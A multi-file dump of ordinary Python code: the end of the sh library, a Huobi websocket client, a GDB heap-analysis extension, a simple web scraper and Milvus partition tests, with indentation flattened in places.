banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n"
print(banner.format(version=__version__))
while True:
try:
line = raw_input("sh> ")
except (ValueError, EOFError):
break
try:
exec(compile(line, "<dummy>", "single"), env, env)
except SystemExit:
break
except:
print(traceback.format_exc())
# cleans up our last line
print("")
# this is a thin wrapper around THIS module (we patch sys.modules[__name__]).
# this is in the case that the user does a "from sh import whatever"
# in other words, they only want to import certain programs, not the whole
# system PATH worth of commands. in this case, we just proxy the
# import lookup to our Environment class
class SelfWrapper(ModuleType):
def __init__(self, self_module, baked_args={}):
# this is super ugly to have to copy attributes like this,
# but it seems to be the only way to make reload() behave
# nicely. if i make these attributes dynamic lookups in
# __getattr__, reload sometimes chokes in weird ways...
for attr in ["__builtins__", "__doc__", "__file__", "__name__", "__package__"]:
setattr(self, attr, getattr(self_module, attr, None))
# python 3.2 (2.7 and 3.3 work fine) breaks on osx (not ubuntu)
# if we set this to None. and 3.3 needs a value for __path__
self.__path__ = []
self.__self_module = self_module
self.__env = Environment(globals(), baked_args=baked_args)
def __getattr__(self, name):
return self.__env[name]
def __call__(self, **kwargs):
""" returns a new SelfWrapper object, where all commands spawned from it
have the baked_args kwargs set on them by default """
baked_args = self.__env.baked_args.copy()
baked_args.update(kwargs)
new_mod = self.__class__(self.__self_module, baked_args)
# inspect the line in the parent frame that calls and assigns the new sh
# variable, and get the name of the new variable we're assigning to.
        # this is very brittle and pretty much a sin. but it works 99% of
# the time and the tests pass
#
# the reason we need to do this is because we need to remove the old
# cached module from sys.modules. if we don't, it gets re-used, and any
# old baked params get used, which is not what we want
parent = inspect.stack()[1]
try:
code = parent[4][0].strip()
except TypeError:
# On the REPL or from the commandline, we don't get the source code in the
# top stack frame
# Older versions of pypy don't set parent[1] the same way as CPython or newer versions
# of Pypy so we have to special case that too.
if parent[1] in ('<stdin>', '<string>') or (
parent[1] == '<module>' and platform.python_implementation().lower() == 'pypy'):
# This depends on things like Python's calling convention and the layout of stack
# frames but it's a fix for a bug in a very cornery cornercase so....
module_name = parent[0].f_code.co_names[-1]
else:
raise
else:
parsed = ast.parse(code)
try:
module_name = parsed.body[0].targets[0].id
except Exception:
# Diagnose what went wrong
if not isinstance(parsed.body[0], ast.Assign):
raise RuntimeError("A new execution context must be assigned to a variable")
raise
if module_name == __name__:
raise RuntimeError("Cannot use the name '%s' as an execution context" % __name__)
sys.modules.pop(module_name, None)
return new_mod
def in_importlib(frame):
""" helper for checking if a filename is in importlib guts """
return frame.f_code.co_filename == "<frozen importlib._bootstrap>"
def register_importer():
""" registers our fancy importer that can let us import from a module name,
like:
import sh
tmp = sh()
from tmp import ls
"""
def test(importer):
try:
return importer.__class__.__name__ == ModuleImporterFromVariables.__name__
except AttributeError:
# ran into importer which is not a class instance
return False
already_registered = any([True for i in sys.meta_path if test(i)])
if not already_registered:
importer = ModuleImporterFromVariables(
restrict_to=[SelfWrapper.__name__],
)
sys.meta_path.insert(0, importer)
return not already_registered
def fetch_module_from_frame(name, frame):
mod = frame.f_locals.get(name, frame.f_globals.get(name, None))
return mod
class ModuleImporterFromVariables(object):
""" a fancy importer that allows us to import from a variable that was
recently set in either the local or global scope, like this:
sh2 = sh(_timeout=3)
from sh2 import ls
"""
def __init__(self, restrict_to=None):
self.restrict_to = set(restrict_to or set())
def find_module(self, mod_fullname, path=None):
""" mod_fullname doubles as the name of the VARIABLE holding our new sh
context. for example:
derp = sh()
from derp import ls
here, mod_fullname will be "derp". keep that in mind as we go through
the rest of this function """
parent_frame = inspect.currentframe().f_back
while parent_frame and in_importlib(parent_frame):
parent_frame = parent_frame.f_back
# Calling PyImport_ImportModule("some_module"); via the C API may not
# have a parent frame. Early-out to avoid in_importlib() trying to
# get f_code from None when looking for 'some_module'.
# This also happens when using gevent apparently.
if not parent_frame:
return None
# this line is saying "hey, does mod_fullname exist as a name we've
        # defined previously?" the purpose of this is to ensure that
# mod_fullname is really a thing we've defined. if we haven't defined
# it before, then we "can't" import from it
module = fetch_module_from_frame(mod_fullname, parent_frame)
if not module:
return None
# make sure it's a class we're allowed to import from
if module.__class__.__name__ not in self.restrict_to:
return None
return self
def load_module(self, mod_fullname):
parent_frame = inspect.currentframe().f_back
while in_importlib(parent_frame):
parent_frame = parent_frame.f_back
module = fetch_module_from_frame(mod_fullname, parent_frame)
# we HAVE to include the module in sys.modules, per the import PEP.
# older versions of python were more lenient about this being set, but
# not in >= python3.3, unfortunately. this requirement necessitates the
# ugly code in SelfWrapper.__call__
sys.modules[mod_fullname] = module
module.__loader__ = self
return module
def run_tests(env, locale, args, version, force_select, **extra_env): # pragma: no cover
py_version = "python"
py_version += str(version)
py_bin = which(py_version)
return_code = None
poller = "poll"
if force_select:
poller = "select"
if py_bin:
print("Testing %s, locale %r, poller: %s" % (py_version.capitalize(),
locale, poller))
env["SH_TESTS_USE_SELECT"] = str(int(force_select))
env["LANG"] = locale
for k,v in extra_env.items():
env[k] = str(v)
cmd = [py_bin, "-W", "ignore", os.path.join(THIS_DIR, "test.py")] + args[1:]
print("Running %r" % cmd)
launch = lambda: os.spawnve(os.P_WAIT, cmd[0], cmd, env)
return_code = launch()
return return_code
# we're being run as a stand-alone script
if __name__ == "__main__": # pragma: no cover
def parse_args():
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-e", "--envs", dest="envs", action="append")
parser.add_option("-l", "--locales", dest="constrain_locales", action="append")
options, args = parser.parse_args()
envs = options.envs or []
constrain_locales = options.constrain_locales or []
return args, envs, constrain_locales
# these are essentially restrictions on what envs/constrain_locales to restrict to for
# the tests. if they're empty lists, it means use all available
args, constrain_versions, constrain_locales = parse_args()
action = None
if args:
action = args[0]
if action in ("test", "travis", "tox"):
import test
coverage = None
if test.HAS_UNICODE_LITERAL:
import coverage
env = os.environ.copy()
env["SH_TESTS_RUNNING"] = "1"
if coverage:
test.append_module_path(env, coverage)
# if we're testing locally, run all versions of python on the system
if action == "test":
all_versions = ("2.6", "2.7", "3.1", "3.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8")
# if we're testing on travis or tox, just use the system's default python, since travis will spawn a vm per
# python version in our .travis.yml file, and tox will run its matrix via tox.ini
elif action in ("travis", "tox"):
v = sys.version_info
sys_ver = "%d.%d" % (v[0], v[1])
all_versions = (sys_ver,)
all_force_select = [True]
if HAS_POLL:
all_force_select.append(False)
all_locales = ("en_US.UTF-8", "C")
i = 0
ran_versions = set()
for locale in all_locales:
# make sure this locale is allowed
if constrain_locales and locale not in constrain_locales:
continue
for version in all_versions:
# make sure this version is allowed
if constrain_versions and version not in constrain_versions:
continue
for force_select in all_force_select:
env_copy = env.copy()
ran_versions.add(version)
exit_code = run_tests(env_copy, locale, args, version,
force_select, SH_TEST_RUN_IDX=i)
if exit_code is None:
print("Couldn't find %s, skipping" % version)
elif exit_code != 0:
print("Failed for %s, %s" % (version, locale))
exit(1)
i += 1
print("Tested Python versions: %s" % ",".join(sorted(list(ran_versions))))
else:
env = Environment(globals())
run_repl(env)
# we're being imported from somewhere
else:
self = sys.modules[__name__]
sys.modules[__name__] = SelfWrapper(self)
register_importer()
|
ws_utils.py | import websocket
import threading
import gzip
import json
from datetime import datetime
from urllib import parse
import hmac
import base64
from hashlib import sha256
from alpha.platforms.huobi_usdt_swap.logger import *
import time
class WsUtils:
def __init__(self, path: str, host: str = None, access_key: str = None, secret_key: str = None):
self._path = path
if host is None:
host = "api.btcgateway.pro"
self._host = host
url = 'wss://{}{}'.format(host, path)
logger.info(url)
self._ws = websocket.WebSocketApp(url,
on_open=self._on_open,
on_message=self._on_msg,
on_close=self._on_close,
on_error=self._on_error)
self._worker = threading.Thread(target=self._ws.run_forever)
self._worker.start()
self._has_open = False
self._auth = True
self._access_key = access_key
self._secret_key = secret_key
        # only attempt authentication when both keys are provided
        if access_key is not None and secret_key is not None:
            self._auth = False
self._sub_str = None
self._sub_callback = None
self._req_callback = None
self._active_close = False
def __del__(self):
self.close()
def _send_auth_data(self, method: str, path: str, host: str, access_key: str, secret_key: str):
# timestamp
timestamp = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%S")
# get Signature
suffix = 'AccessKeyId={}&SignatureMethod=HmacSHA256&SignatureVersion=2&Timestamp={}'.format(
access_key, parse.quote(timestamp))
payload = '{}\n{}\n{}\n{}'.format(method.upper(), host, path, suffix)
digest = hmac.new(secret_key.encode('utf8'), payload.encode(
'utf8'), digestmod=sha256).digest()
signature = base64.b64encode(digest).decode()
# data
data = {
"op": "auth",
"type": "api",
"AccessKeyId": access_key,
"SignatureMethod": "HmacSHA256",
"SignatureVersion": "2",
"Timestamp": timestamp,
"Signature": signature
}
data = json.dumps(data)
self._ws.send(data)
logger.debug(data)
def _on_open(self):
logger.info('ws open.')
        if not self._auth:
self._send_auth_data('get', self._path, self._host,
self._access_key, self._secret_key)
self._has_open = True
def _on_msg(self, message):
plain = gzip.decompress(message).decode()
jdata = json.loads(plain)
if 'ping' in jdata:
sdata = plain.replace('ping', 'pong')
self._ws.send(sdata)
elif 'op' in jdata:
opdata = jdata['op']
if opdata == 'ping':
sdata = plain.replace('ping', 'pong')
self._ws.send(sdata)
elif opdata == 'auth':
if jdata['err-code'] == 0:
self._auth = True
logger.info(plain)
elif opdata == 'sub':
logger.info(plain)
elif opdata == 'unsub':
logger.info(plain)
elif opdata == 'notify':
if self._sub_callback is not None:
self._sub_callback(jdata)
else:
pass
elif 'subbed' in jdata:
logger.info(plain)
elif 'ch' in jdata:
if self._sub_callback is not None:
self._sub_callback(jdata)
elif 'rep' in jdata:
if self._req_callback is not None:
self._req_callback(jdata)
self._req_callback = None
else:
pass
def _on_close(self):
logger.info("ws close.")
if not self._active_close and self._sub_str is not None:
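            # re-subscribe after an unexpected close. note: sub() is assumed
            # to be provided by a subclass wrapping _sub()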
self.sub(self._sub_str, self._sub_callback)
def _on_error(self, error):
logger.error(error)
def _sub(self, sub_str: str, callback):
while not self._has_open:
time.sleep(1)
self._sub_str = sub_str
self._sub_callback = callback
self._ws.send(sub_str)
logger.debug(sub_str)
def _unsub(self, unsub_str: str):
while not self._has_open:
time.sleep(1)
self._sub_str = None
self._sub_callback = None
self._ws.send(unsub_str)
logger.debug(unsub_str)
def _req(self, req_str: str, callback):
while not self._has_open:
time.sleep(1)
self._req_callback = callback
self._ws.send(req_str)
logger.info(req_str)
def close(self):
self._active_close = True
self._sub_str = None
self._sub_callback = None
self._req_callback = None
self._ws.close()
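# minimal usage sketch (hypothetical credentials and topic; concrete clients
# normally subclass WsUtils and expose sub/req wrappers around _sub/_req):
#   ws = WsUtils("/notification", access_key="AK", secret_key="SK")
#   ws._sub('{"op": "sub", "topic": "accounts.*"}', callback=logger.info)
#   ...
#   ws.close()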
|
__init__.py | """The heap package is a Python extension for GDB which adds support for
analyzing the heap.
Currently only one heap implementation, that of glibc, is supported.
"""
import _gdb as gdb
import sys
import threading
from _heap import HeapDetectionError, WrongHeapVersionError, UnsupportedHeap
from glibc import detect_glibc_heap
from commands import activate_basic_commands
# Always import any non-standard GDB helpers from _gdb
from _gdb import watch_active_inferior
_heap_detectors = [detect_glibc_heap]
# Sanity check that we have the minimum supported version. This is just a
# precaution, I don't think GDB embedded any Python versions under 2.6
assert sys.version_info[0:2] >= (2, 6)
# GDB can have multiple inferiors and in theory each of these inferiors
# might have a different heap implementation. As such, we have to keep a
# different analyzer for each inferior, and try to be smart about swapping
# between inferiors. This includes activating commands on a per-inferior
# basis, which can be accomplished by simply registering the commands again
# in the correct order.
class AnalyzerState(object):
"""Class to keep track of the current state of the overall extension, such
as which inferior the analyzer is working on.
For all intents and purposes, this class is a singleton, but not enforced.
    This class also has basic thread-safety via coarse-grained, recursive locking.
"""
def __init__(self):
self._lock = threading.RLock()
self.inferior_to_analyzer_map = dict.fromkeys(gdb.inferiors(), None)
# Use a background thread to monitor if the user switches inferiors
background_function = lambda: watch_active_inferior(self.on_inferior_change,
gdb.selected_inferior())
inferior_watcher = threading.Thread(target=background_function)
inferior_watcher.daemon = True
inferior_watcher.start()
def get_current_analyzer(self):
with self._lock:
inferior = gdb.selected_inferior()
# Use setdefault in case this is a new inferior we haven't seen
return self.inferior_to_analyzer_map.setdefault(inferior, None)
def detect_heap(self):
with self._lock:
inferior = gdb.selected_inferior()
# Assert that this inferior has not already been detected
assert self.inferior_to_analyzer_map[inferior] is None
heap_analyzer = UnsupportedHeap
for detector in _heap_detectors:
try:
heap_analyzer = detector(inferior)
break
except HeapDetectionError:
pass # Expected error
except WrongHeapVersionError, e:
print "INFO: Unsupported heap version detected: {0}".format(e)
break
self.inferior_to_analyzer_map[inferior] = heap_analyzer
return heap_analyzer
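    # sketch of the detector contract implied above: a detector takes an
    # inferior and either returns an analyzer, raises HeapDetectionError
    # ("not my heap"), or raises WrongHeapVersionError ("my heap, but an
    # unsupported version"), e.g.:
    #
    #   def detect_some_heap(inferior):          # hypothetical detector
    #       if not is_some_heap(inferior):       # hypothetical check
    #           raise HeapDetectionError()
    #       return SomeHeapAnalyzer(inferior)    # hypothetical analyzer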
def on_inferior_change(self, new_inferior):
with self._lock:
# First wipe the active commands back to basics
activate_basic_commands(self)
# Check to see if an analyzer exists yet for this inferior
analyzer = self.inferior_to_analyzer_map.setdefault(new_inferior, None)
# If one does, activate the commands for it
if analyzer is not UnsupportedHeap and analyzer is not None:
analyzer.activate_commands()
# Register the basic heap commands
activate_basic_commands(AnalyzerState()) |
scraper.py | #encoding:utf-8
import threading
import Queue
import urlparse
import requests
import bs4
class ScraperWorkerBase(object):
"""
    No need to learn how this works internally:
    override parse_page using self.soup (a BeautifulSoup object) and return a result.
    You can then get the result as
    (inpage_urls, your_own_result) = urlscraper.execute()
"""
def __init__(self, url = ''):
self.target_url = url
self.netloc = urlparse.urlparse(self.target_url)[1]
self.response = None
self.soup = None
self.url_in_site = []
self.url_out_site = []
def __get_html_data(self):
try:
self.response = requests.get(self.target_url, timeout = 5)
except:
return ""
print "[_] Got response"
return self.response.text
    def __get_soup(self):
        text = self.__get_html_data()
        if text == '':
            # return None (not []) so the check in __get_all_url works
            return None
        return bs4.BeautifulSoup(text)
def __get_all_url(self):
url_lists = []
self.soup = self.__get_soup()
        if self.soup is None:
return []
all_tags = self.soup.findAll("a")
for a in all_tags:
try:
#print a['href']
url_lists.append(a["href"])
except:
pass
return url_lists
def get_urls_inpage(self):
ret_list = self.__get_all_url()
if ret_list == []:
return ([],[])
else:
for url in ret_list:
o = urlparse.urlparse(url)
#
#print url
if self.netloc in o[1]:
self.url_in_site.append(o.geturl())
else:
self.url_out_site.append(o.geturl())
inurlset = set(self.url_in_site)
outurlset = set(self.url_out_site)
return inurlset, outurlset
def execute(self):
inpage_url = self.get_urls_inpage()
undefined_result = self.parse_page()
return inpage_url, undefined_result
def parse_page(self):
pass
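# a minimal subclass sketch (hypothetical worker; Python 2, matching this module):
#   class TitleWorker(ScraperWorkerBase):
#       def parse_page(self):
#           if self.soup is None:
#               return None
#           return self.soup.title.string if self.soup.title else None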
class Scraper(object):
def __init__(self, single_page = True, workers_num = 8, worker_class = ScraperWorkerBase):
self.count = 0
self.workers_num = workers_num
"""get worker_class"""
self.worker_class = worker_class
"""check if the workers should die"""
self.all_dead = False
"""store the visited pages"""
self.visited = set()
"""by ScraperWorkerBase 's extension result queue"""
self.result_urls_queue = Queue.Queue()
self.result_elements_queue = Queue.Queue()
"""
if single_page == True,
the task_queue should store the tasks (unhandled)
"""
self.task_queue = Queue.Queue()
self.single_page = single_page
if self.single_page == False:
self.__init_workers()
else:
self.__init_single_worker()
def __check_single_page(self):
if self.single_page == True:
            raise StandardError('[!] Single page mode won\'t allow you to use many workers')
"""init worker(s)"""
def __init_single_worker(self):
ret = threading.Thread(target=self._single_worker)
ret.start()
def __init_workers(self):
self.__check_single_page()
for _ in range(self.workers_num):
ret = threading.Thread(target=self._worker)
ret.start()
"""return results"""
def get_result_urls_queue(self):
return self.result_urls_queue
def get_result_elements_queue(self):
return self.result_elements_queue
"""woker function"""
def _single_worker(self):
        self.all_dead = False
scraper = None
while not self.all_dead:
try:
url = self.task_queue.get(block=True)
                print 'Working on', url
                try:
                    # strip any '#fragment' before checking the visited set
                    if url[:url.index('#')] in self.visited:
                        continue
                except ValueError:
                    # no '#' in this url
                    pass
                if url in self.visited:
                    continue
                self.count = self.count + 1
                print 'Processed', self.count, 'pages'
scraper = self.worker_class(url)
self.visited.add(url)
urlset, result_entity = scraper.execute()
for i in urlset[0]:
#self.task_queue.put(i)
self.result_urls_queue.put(i)
                if result_entity is not None:
                    self.result_elements_queue.put(result_entity)
            except:
                pass
def _worker(self):
        self.all_dead = False
scraper = None
while not self.all_dead:
try:
url = self.task_queue.get(block=True)
                print 'Working on', url
                try:
                    # strip any '#fragment' before checking the visited set
                    if url[:url.index('#')] in self.visited:
                        continue
                except ValueError:
                    # no '#' in this url
                    pass
                if url in self.visited:
                    continue
self.count = self.count + 1
                print 'Processed', self.count, 'pages'
scraper = self.worker_class(url)
self.visited.add(url)
urlset, result_entity = scraper.execute()
for i in urlset[0]:
                    if i in self.visited:
                        continue
self.task_queue.put(i)
self.result_urls_queue.put(i)
                if result_entity is not None:
                    self.result_elements_queue.put(result_entity)
            except:
                pass
"""scraper interface"""
def kill_workers(self):
        self.all_dead = True
def feed(self, target_urls = []):
if isinstance(target_urls, list):
for target_url in target_urls:
self.task_queue.put(target_url)
elif isinstance(target_urls, str):
self.task_queue.put(target_urls)
else:
pass
#return url result
return (self.get_result_urls_queue(), self.get_result_elements_queue() )
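# rough usage sketch (hypothetical URL; note that workers block on the task
# queue, so kill_workers only takes effect after another task is consumed):
#   s = Scraper(single_page=True)
#   url_q, elem_q = s.feed('http://example.com/')
#   print url_q.get()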
|
test_partition.py | import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from utils.utils import *
from common.constants import *
from common.common_type import CaseLabel
TIMEOUT = 120
class TestCreateBase:
"""
******************************************************************
The following cases are used to test `create_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_a(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(600)
def test_create_partition_limit(self, connect, collection, args):
'''
target: test create partitions, check status returned
method: call function: create_partition for 4097 times
expected: exception raised
'''
threads_num = 8
threads = []
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
def create(connect, threads_num):
for i in range(max_partition_num // threads_num):
tag_tmp = gen_unique_str()
connect.create_partition(collection, tag_tmp)
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = threading.Thread(target=create, args=(m, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
tag_tmp = gen_unique_str()
with pytest.raises(Exception) as e:
connect.create_partition(collection, tag_tmp)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_repeat(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
try:
connect.create_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: partition name = %s already exists" % default_tag
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_collection_not_existed(self, connect):
"""
target: verify the response when creating a partition with a non_existing collection
method: create a partition with a non_existing collection
expected: raise an exception
"""
collection_name = gen_unique_str()
try:
connect.create_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_name_name_none(self, connect, collection):
'''
target: test create partition, tag name set None, check status returned
method: call function: create_partition
expected: status ok
'''
tag_name = None
try:
connect.create_partition(collection, tag_name)
except Exception as e:
assert e.args[0] == "`partition_name` value None is illegal"
@pytest.mark.tags(CaseLabel.L0)
def test_create_different_partition_names(self, connect, collection):
"""
target: test create partition twice with different names
method: call function: create_partition, and again
expected: status ok
"""
connect.create_partition(collection, default_tag)
tag_name = gen_unique_str()
connect.create_partition(collection, tag_name)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, tag_name, '_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_default(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_with_tag(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_with_tag_not_existed(self, connect, collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status not ok
'''
tag_new = "tag_new"
connect.create_partition(collection, default_tag)
ids = [i for i in range(default_nb)]
try:
connect.insert(collection, default_entities, partition_name=tag_new)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % tag_new
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_same_tags(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
ids = [(i+default_nb) for i in range(default_nb)]
new_result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([id_collection])
res = connect.get_collection_stats(id_collection)
assert res["row_count"] == default_nb * 2
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_insert_same_tags_two_collections(self, connect, collection):
'''
target: test create two partitions, and insert vectors with the same tag to each collection, check status returned
method: call function: create_partition
expected: status ok, collection length is correct
'''
connect.create_partition(collection, default_tag)
collection_new = gen_unique_str()
connect.create_collection(collection_new, default_fields)
connect.create_partition(collection_new, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
new_result = connect.insert(collection_new, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([collection, collection_new])
res = connect.get_collection_stats(collection)
assert res["row_count"] == default_nb
res = connect.get_collection_stats(collection_new)
assert res["row_count"] == default_nb
class TestShowBase:
"""
******************************************************************
The following cases are used to test `list_partitions` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partition first, then call function: list_partitions
expected: status ok, partition correct
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions_no_partition(self, connect, collection):
'''
target: test show partitions with collection name, check status and partitions returned
method: call function: list_partitions
expected: status ok, partitions correct
'''
res = connect.list_partitions(collection)
assert compare_list_elements(res, ['_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_show_multi_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partitions first, then call function: list_partitions
expected: status ok, partitions correct
'''
tag_new = gen_unique_str()
connect.create_partition(collection, default_tag)
connect.create_partition(collection, tag_new)
res = connect.list_partitions(collection)
assert compare_list_elements(res, [default_tag, tag_new, '_default'])
class TestHasBase:
"""
******************************************************************
The following cases are used to test `has_partition` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_a(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
connect.create_partition(collection, default_tag)
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_multi_partitions(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
connect.create_partition(collection, tag_name)
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
res = connect.has_partition(collection, tag_name)
assert res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_name_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with tag not existed
expected: status ok, result empty
'''
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert not res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_collection_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with collection not existed
expected: status not ok
'''
collection_name = "not_existed_collection"
try:
connect.has_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "HasPartition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test has partition, with invalid tag name, check status returned
method: call function: has_partition
expected: status ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.has_partition(collection, tag_name)
class TestDropBase:
"""
******************************************************************
The following cases are used to test `drop_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_a(self, connect, collection):
'''
target: test drop partition, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
res1 = connect.list_partitions(collection)
assert default_tag in res1
connect.drop_partition(collection, default_tag)
res2 = connect.list_partitions(collection)
assert default_tag not in res2
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_name_not_existed(self, connect, collection):
'''
target: test drop partition, but tag not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_tag = "new_tag"
try:
connect.drop_partition(collection, new_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % new_tag
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_name_not_existed_A(self, connect, collection):
'''
target: test drop partition, but collection not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_collection = gen_unique_str()
try:
connect.drop_partition(new_collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: can't find collection: %s" % new_collection
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_repeatedly(self, connect, collection):
'''
target: test drop partition twice, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status not ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
connect.drop_partition(collection, default_tag)
time.sleep(2)
try:
connect.drop_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % default_tag
tag_list = connect.list_partitions(collection)
assert default_tag not in tag_list
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_create(self, connect, collection):
'''
target: test drop partition, and create again, check status
method: create partitions first, then call function: drop_partition, create_partition
expected: status not ok, partition in db
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
connect.drop_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), ['_default'])
time.sleep(2)
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
class TestNameInvalid(object):
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test drop partition, with invalid collection name, check status returned
method: call function: drop_partition
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection_name, default_tag)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test drop partition, with invalid tag name, check status returned
method: call function: drop_partition
expected: status not ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection, tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_partitions_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test show partitions, with invalid collection name, check status returned
method: call function: list_partitions
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.list_partitions(collection_name)
class TestNewCase(object):
@pytest.mark.tags(CaseLabel.L0)
def test_drop_default_partition_A(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
try:
connect.drop_partition(collection, partition_name='_default')
